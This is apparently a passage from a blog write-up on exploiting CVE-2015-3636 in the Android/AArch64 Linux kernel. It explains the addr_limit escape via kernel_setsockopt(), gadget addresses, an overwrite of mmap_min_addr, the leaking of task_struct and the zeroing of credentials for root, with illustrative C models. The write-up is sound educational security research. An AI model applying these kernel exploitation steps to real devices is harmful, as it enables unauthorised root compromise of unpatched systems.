The trick here was proposed in 2016, and works through the function int kernel_setsockopt().
int kernel_setsockopt(struct socket *sock, int level, int optname,
char *optval, unsigned int optlen)
{
mm_segment_t oldfs = get_fs();
char __user *uoptval;
int err;
uoptval = (char __user __force *) optval;
set_fs(KERNEL_DS);
if (level == SOL_SOCKET)
err = sock_setsockopt(sock, level, optname, uoptval, optlen);
else
err = sock->ops->setsockopt(sock, level, optname, uoptval,
optlen);
set_fs(oldfs);
return err;
}
In this function, the kernel first saves the current mm_segment_t to oldfs and updates it to KERNEL_DS, which is 0xffffffffffffffff here, giving the current thread the ability to read and write kernel memory. After sock_setsockopt() finishes, oldfs is restored. As we can hijack the pc to construct a ROP chain, we can
- redirect sk->sk_prot->close(sk, timeout); to kernel_setsockopt.
- construct a fake ops in sock so that sock->ops->setsockopt calls somewhere else and escapes the set_fs(oldfs);.
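The save, widen, call, restore shape is easy to play with in user space. The sketch below is only an analogy, not kernel code: a global variable stands in for addr_limit, and longjmp() stands in for a hijacked setsockopt pointer that never returns into kernel_setsockopt(). All model_ names are invented, and 0x8000000000 is the oldfs value this post reports from debugging.

```c
#include <assert.h>
#include <setjmp.h>
#include <stdint.h>

#define MODEL_USER_DS   0x8000000000ULL
#define MODEL_KERNEL_DS 0xffffffffffffffffULL

static uint64_t model_addr_limit = MODEL_USER_DS;
static jmp_buf model_escape;

typedef void (*model_setsockopt_fn)(void);

/* Same save / widen / call / restore shape as kernel_setsockopt(). */
static void model_kernel_setsockopt(model_setsockopt_fn fn)
{
    uint64_t oldfs = model_addr_limit;

    model_addr_limit = MODEL_KERNEL_DS;
    fn();
    model_addr_limit = oldfs;     /* never reached if fn() escapes */
}

/* A well-behaved callee returns normally. */
static void model_benign(void)
{
}

/* A hijacked callee leaves without returning to its caller. */
static void model_hijacked(void)
{
    longjmp(model_escape, 1);
}

/* Runs the model once and reports the limit left behind. */
static uint64_t model_run(model_setsockopt_fn fn)
{
    model_addr_limit = MODEL_USER_DS;
    if (setjmp(model_escape) == 0)
        model_kernel_setsockopt(fn);
    return model_addr_limit;
}
```

With the benign callee the limit comes back as the user value; with the escaping one it stays at the all-ones KERNEL_DS value, which is the effect the fake ops is after.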
When it comes to the details, I picked the assembly code below as well as some values learned from debugging.
kernel_setsockopt
.text:FFFFFFC0003443CC STP X29, X30, [SP,#-0x20+var_s0]!
.text:FFFFFFC0003443D0 CMP W1, #1
.text:FFFFFFC0003443D4 MOV X5, SP
.text:FFFFFFC0003443D8 MOV X29, SP
.text:FFFFFFC0003443DC STP X19, X20, [SP,#var_s10]
.text:FFFFFFC0003443E0 AND X19, X5, #0xFFFFFFFFFFFFC000
.text:FFFFFFC0003443E4 MOV X5, #0xFFFFFFFFFFFFFFFF
.text:FFFFFFC0003443E8 LDR X20, [X19,#8]
.text:FFFFFFC0003443EC STR X5, [X19,#8]
.text:FFFFFFC0003443F0 B.EQ loc_FFFFFFC000344410
.text:FFFFFFC0003443F4 LDR X5, [sock,#0x28]
.text:FFFFFFC0003443F8 LDR X5, [X5,#0x68]
.text:FFFFFFC0003443FC BLR X5 # break points here
.text:FFFFFFC000344400 STR oldfs, [X19,#8]
.text:FFFFFFC000344404 LDP X19, oldfs, [SP,#var_s10]
.text:FFFFFFC000344408 LDP X29, X30, [SP+var_s0],#0x20
.text:FFFFFFC00034440C RET
When the ROP chain reaches 0xFFFFFFC0003443FC, the X20 register holds the oldfs variable, whose value is 0x8000000000. At this point, [SP+0x10] and [SP+0x18] store the old values of X19 and X20 (see the STP X19, X20 instruction above). We don’t have to know these details; the compiler saves them simply because the calling convention requires it.
The called routine is expected to preserve r19-r28. link
By doing this, the control flow bypasses the code at 0xFFFFFFC000344400 without side effects. (Remember that on a RISC architecture like this one, the return address is not automatically pushed onto the stack!)
In all, after addr_limit is maliciously enlarged, we obtain an arbitrary read & write primitive through pipe read & write. (For now just remember this; a post discussing pipes will be released in the near future ;D)
Enable mmap at NULL address
Enabling mmap at the NULL address helps the subsequent missions (leaking task_struct). To do so, we can use the arbitrary write primitive to overwrite the variable mmap_min_addr in the kernel data section.
Leaking task_struct
Cool. We can now write anywhere we want and (to some extent) hijack the control flow when closing a vulnerable socket. The direct idea for privilege escalation is to overwrite the real_cred struct of the current task_struct. Once we leak the address of this target, we can easily modify its values.
How to do that?
An interesting finding from when we achieved the arbitrary read & write primitive can be discussed now. Let’s look into set_fs and get_fs.
#define get_fs() (current_thread_info()->addr_limit)
static inline void set_fs(mm_segment_t fs)
{
current_thread_info()->addr_limit = fs;
}
We see that both get_fs and set_fs go through current_thread_info(). How is that implemented in code?
static inline struct thread_info *current_thread_info(void)
{
register unsigned long sp asm ("sp");
return (struct thread_info *)(sp & ~(THREAD_SIZE - 1));
}
Isn’t that amazing? To obtain the current thread_info, all you have to do is AND the current stack pointer with 0xFFFFFFFFFFFFC000. How beautiful the alignment is! Why this odd-looking function can extract the thread_info is answered by the kernel stack design. On AArch64, the kernel stack of each thread is 16 KB, and the corresponding thread_info is located right at its start. Hence, you know why this trick works.
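The masking in current_thread_info() can be checked against the two crash logs earlier in this post, which print both sp and ti. A minimal sketch, assuming the 16 KB stack size stated above (model_thread_info and MODEL_THREAD_SIZE are illustrative names):

```c
#include <assert.h>
#include <stdint.h>

#define MODEL_THREAD_SIZE 0x4000ULL   /* 16 KB kernel stack */

/* User-space copy of the masking done by current_thread_info(). */
static uint64_t model_thread_info(uint64_t sp)
{
    return sp & ~(MODEL_THREAD_SIZE - 1);
}
```

For the first oops, sp is ffffffc03db47da0 and the mask yields ffffffc03db44000, the ti value printed in the same log; the second oops (sp ffffffc03dbd7d90, ti ffffffc03dbd4000) agrees as well.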
What we do next is find a proper gadget to get the address of thread_info, and from it the address of task_struct. Existing solutions use a gadget in mutex_trylock().
.text:FFFFFFC00045457C MOV X2, SP
.text:FFFFFFC000454580 AND X2, X2, #0xFFFFFFFFFFFFC000
.text:FFFFFFC000454584 LDR X2, [X2,#0x10]
.text:FFFFFFC000454588 STR X2, [X1,#0x18]
.text:FFFFFFC00045458C RET
With the help of this gadget, the value at thread_info+0x10, which is the struct task_struct *task, is stored to the address X1 + 0x18. Back at the PC hijack position in inet_release(), X1 holds the variable timeout, whose value is 0 in our experiment. That is to say, the address of the current task_struct is stored at virtual address 0x0 + 0x18. (Now you understand why we need to enable mmap at the NULL address.)
The remaining part is quite clear: with the real_cred offset in hand, we can rewrite uid, gid, suid… to zero. In addition, some solutions clear task_struct->files->fdt to avoid an early crash (because a large number of UAF sockets are still around).
The entire code can be found here.
A screenshot of the exploit run can be viewed below.
The old CVE-2015-3636 is quite an attractive one. Playing with it teaches you the basics of advanced kernel exploitation, and it can also open the door to Android hacking for you. I hope this blog helped you understand the internals of this bug and the way to hijack it.
In addition, if you want to simplify the experiment by using a standard x86 machine, be careful. During my exploration, I found that on a 32-bit architecture the kmem_cache for the ping sock is merged with others, which causes big trouble for heap spraying. An AArch64 or x64 machine is preferable.